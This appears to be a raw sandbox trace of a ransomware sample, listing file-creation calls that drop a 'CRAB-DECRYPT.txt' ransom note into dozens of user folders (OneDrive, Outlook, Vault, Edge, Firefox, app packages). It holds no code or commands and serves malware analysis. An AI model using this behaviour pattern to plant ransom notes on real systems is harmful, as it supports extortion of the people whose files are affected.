Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\OneDrive\17.3.7294.0108\sr-latn-rs\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\OneDrive\17.3.7294.0108\sv\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\OneDrive\17.3.7294.0108\sw\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\OneDrive\17.3.7294.0108\ta\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\OneDrive\17.3.7294.0108\te\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\OneDrive\17.3.7294.0108\tg-cyrl\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\OneDrive\17.3.7294.0108\th\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\OneDrive\17.3.7294.0108\ti\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\OneDrive\17.3.7294.0108\tk-tm\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\OneDrive\17.3.7294.0108\tn-za\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\OneDrive\17.3.7294.0108\tr\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\OneDrive\17.3.7294.0108\tt\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\OneDrive\17.3.7294.0108\ug-arab\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\OneDrive\17.3.7294.0108\uk\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\OneDrive\17.3.7294.0108\ur\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\OneDrive\17.3.7294.0108\uz-latn-uz\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\OneDrive\17.3.7294.0108\vi\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\OneDrive\17.3.7294.0108\wo\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\OneDrive\17.3.7294.0108\xh-za\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\OneDrive\17.3.7294.0108\yo-ng\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\OneDrive\17.3.7294.0108\zh-cn\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\OneDrive\17.3.7294.0108\zh-tw\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\OneDrive\17.3.7294.0108\zu-za\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\OneDrive\logs\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\OneDrive\logs\Common\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\OneDrive\logs\Personal\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\OneDrive\setup\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\OneDrive\setup\logs\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\OneDrive\StandaloneUpdater\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Outlook\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Outlook\gliding\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\PlayReady\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\PlayReady\Internet Explorer\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\PlayReady\Internet Explorer\Desktop\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Publisher\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\TaskSchedulerConfig\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Vault\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Vault\4BF4C442-9B8A-41A0-B380-DD4A704DDB28\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Vault\UserProfileRoaming\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Live\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Live\Bici\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Sidebar\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Sidebar\Gadgets\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Sidebar\settings.ini desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft Help\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\MicrosoftEdge\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\MicrosoftEdge\SharedCacheContainers\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\MicrosoftEdge\SharedCacheContainers\MicrosoftEdge_bingpagedata\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\MicrosoftEdge\SharedCacheContainers\MicrosoftEdge_iecompat\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\MicrosoftEdge\SharedCacheContainers\MicrosoftEdge_iecompatua\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\MicrosoftEdge\SharedCacheContainers\MicrosoftEdge_ieflipahead\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\MicrosoftEdge\User\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\MicrosoftEdge\User\Default\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft_Corporation\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft_Corporation\powershell_ise.exe_StrongName_lw2v2vm3wmtzzpebq33gybmeoxukb04w\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Mozilla\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Mozilla\Firefox\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Mozilla\Firefox\Profiles\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Mozilla\Firefox\Profiles\i6gc44p4.default\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\9E2F88E3.Twitter_wgeqdkkx372wm\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\king.com.CandyCrushSodaSaga_kgqvnymyfvs32\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.3DBuilder_8wekyb3d8bbwe\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.AccountsControl_cw5n1h2txyewy\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.Appconnector_8wekyb3d8bbwe\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.BingFinance_8wekyb3d8bbwe\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.BingNews_8wekyb3d8bbwe\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.BingSports_8wekyb3d8bbwe\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.BingWeather_8wekyb3d8bbwe\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.BioEnrollment_cw5n1h2txyewy\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.CommsPhone_8wekyb3d8bbwe\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.ConnectivityStore_8wekyb3d8bbwe\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.Getstarted_8wekyb3d8bbwe\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.LockApp_cw5n1h2txyewy\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.Messaging_8wekyb3d8bbwe\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.MicrosoftSolitaireCollection_8wekyb3d8bbwe\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.NET.Native.Framework.1.0_8wekyb3d8bbwe\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.NET.Native.Framework.1.1_8wekyb3d8bbwe\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.NET.Native.Framework.1.6_8wekyb3d8bbwe\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.NET.Native.Runtime.1.0_8wekyb3d8bbwe\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.NET.Native.Runtime.1.1_8wekyb3d8bbwe\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.NET.Native.Runtime.1.6_8wekyb3d8bbwe\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.Office.OneNote_8wekyb3d8bbwe\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.Office.Sway_8wekyb3d8bbwe\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.People_8wekyb3d8bbwe\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
